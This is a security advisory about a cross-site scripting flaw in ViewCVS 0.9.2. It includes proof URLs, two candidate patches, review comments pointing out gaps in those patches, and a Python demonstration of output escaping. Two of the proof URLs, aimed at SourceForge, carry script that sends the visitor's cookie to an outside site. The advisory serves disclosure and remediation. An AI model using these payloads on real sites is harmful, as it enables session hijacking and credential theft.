COMMAND

ViewCVS cross-site scripting bug

SYSTEMS AFFECTED

ViewCVS 0.9.2 and below

PROBLEM

office [http://www.office.ac/] says :

ViewCVS is a WWW interface for CVS repositories. It is widely used in the free software community and the open source community. Unfortunately, it has a cross-site scripting vulnerability.

Proof
-----

If you access a URL like:

http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script>

http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>

The former URL works for Internet Explorer 6.0 and Opera 6.01, but not for Netscape 4.78, Netscape 6.2.2 or Mozilla 0.9.9 on Windows XP. All these URLs can do is make a popup window appear.

Example
-------

For example, you can see the vulnerability at SourceForge.net (the vendor's site is on SourceForge.net). If you access the following sample URL, your cookie (including your login information and session information for SourceForge.net) is stolen by my site (http://www.office.ac).

The cookie stolen from Internet Explorer 6.0 includes your login information and session information for SourceForge.net. But the cookie stolen from Opera 6.01 and Mozilla 0.9.9 includes only the user name, and nothing is obtained from Netscape 4.78 and 6.2.2. (I don't know why.)

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>

The ViewCVS at SourceForge.net is not the newest version. And you can see the vulnerability in the newest version of ViewCVS at GNU:

http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=<script>alert("hello")</script>

http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev"><script>alert("hello")</script>

SOLUTION

No official patch yet, check the UNofficial ones below :

Patch by Kenji Suzuki <kenji@po.ganseki.ne.jp> / Hyper NIKKI System Project (http://www.h14m.org/).

--- viewcvs.py.orig	Fri Dec 14 23:14:39 2001
+++ viewcvs.py	Sun Mar 31 15:24:34 2002
@@ -172,7 +172,7 @@
   # parse the query params into a dictionary (and use defaults)
   query_dict = default_settings.copy()
   for name, values in cgi.parse().items():
-    query_dict[name] = values[0]
+    query_dict[name] = cgi.escape(values[0])
 
   # set up query strings, prefixed by question marks and ampersands
   query = sticky_query(query_dict)

This code comes from Taku YASUI <tach@sourceforge.jp> / Sourceforge.jp (http://sourceforge.jp/), who has offered the former patch to the ViewCVS team.

RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v
retrieving revision 1.107
retrieving revision 1.108
diff -u -r1.107 -r1.108
--- viewcvs/viewcvs/lib/viewcvs.py	2002/02/22 09:20:46	1.107
+++ viewcvs/viewcvs/lib/viewcvs.py	2002/04/01 01:32:16	1.108
@@ -180,8 +180,14 @@
   # parse the query params into a dictionary (and use defaults)
   query_dict = default_settings.copy()
+
+  # RE that ViewCVS doesn't use in any URL, but a CSS attack might
+  re_url_validate = re.compile('\'|"|<|>')
   for name, values in cgi.parse().items():
-    query_dict[name] = values[0]
+    # do not accept values that contain non-ViewCVS characters
+    # except for search
+    if not re.search(re_url_validate, values[0]) or name == 'search':
+      query_dict[name] = values[0]
 
   # set up query strings, prefixed by question marks and ampersands
   query = sticky_query(query_dict)
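Review bot: in the first patch (Kenji Suzuki's), cgi.escape(values[0]) is called with its default quote=False, so a double quote passes through unchanged; the advisory's second vector (sortby=rev"><script>...) relies on that quote to close an HTML attribute, so after this patch the <script> tag is neutralised but the attribute boundary is still broken, which leaves room for attribute injection in that context. Use cgi.escape(values[0], quote=True), or better, escape at the point where each value is written into HTML: escaping inside query_dict means the escaped form also flows into sticky_query(query_dict) on the following context line and into every non-HTML use of the parameters (a cvsroot value containing & becomes &amp; in the generated links and in the repository lookup).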
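Review bot: in the second patch (revision 1.108), the `or name == 'search'` exemption leaves the search parameter unfiltered, so it still needs HTML escaping wherever it is rendered, and the hunk documents the exemption without saying where that output escaping happens; without it, search remains the one parameter on which the advisory's payloads still work. Rejecting a value silently leaves the default_settings entry in place, which hides the rejection from the user and from the logs; returning an error for the rejected parameter would be clearer. Minor: the comment's "CSS attack" reads as cascading style sheets, "XSS" is unambiguous, and re_url_validate.search(values[0]) is the idiomatic form of re.search(re_url_validate, values[0]).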
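As an added illustration (not code from the advisory or from ViewCVS), the Python 3 snippet below renders the two parameters from the proof URLs into the two HTML contexts the advisory exercises (text and a quoted attribute) in three ways: raw, with the first patch's cgi.escape()-style escaping that leaves quotes alone, and with output escaping that includes quotes. The markup, the helper names and the check functions are assumptions for the demonstration.

```python
import html

# Constructed sample inputs: the two payload shapes quoted in the advisory.
CVSROOT_PAYLOAD = '<script>alert("hello")</script>'      # lands in element text
SORTBY_PAYLOAD = 'rev"><script>alert("hello")</script>'  # lands in a quoted attribute

def render_raw(cvsroot, sortby):
    """Vulnerable behaviour described in the advisory: values echoed verbatim."""
    return ('<p>Repository: %s</p>'
            '<a href="viewcvs.cgi/?sortby=%s">sort</a>') % (cvsroot, sortby)

def escape_no_quotes(value):
    """Equivalent of Python 2's cgi.escape(value) with its default quote=False."""
    return value.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')

def render_patch1(cvsroot, sortby):
    """First patch's approach: < > & escaped, but " left alone."""
    return render_raw(escape_no_quotes(cvsroot), escape_no_quotes(sortby))

def render_escaped(cvsroot, sortby):
    """Hardened: escape at output with quotes included, so the attribute stays closed."""
    return render_raw(html.escape(cvsroot, quote=True),
                      html.escape(sortby, quote=True))

def injects_tag(page):
    """True if a literal <script> tag survived into the rendered page."""
    return '<script>' in page

def attribute_intact(page):
    """True if the only raw double quotes left are the href attribute's own pair."""
    return page.count('"') == 2

if __name__ == '__main__':
    for name, render in (('raw', render_raw), ('patch1', render_patch1),
                         ('escaped', render_escaped)):
        page = render(CVSROOT_PAYLOAD, SORTBY_PAYLOAD)
        print('%-8s tag injected: %-5s attribute intact: %s'
              % (name, injects_tag(page), attribute_intact(page)))
```

The patch-1 row shows the gap the quote=False default leaves: the tag is gone, but the attribute is still broken open by the payload's double quote.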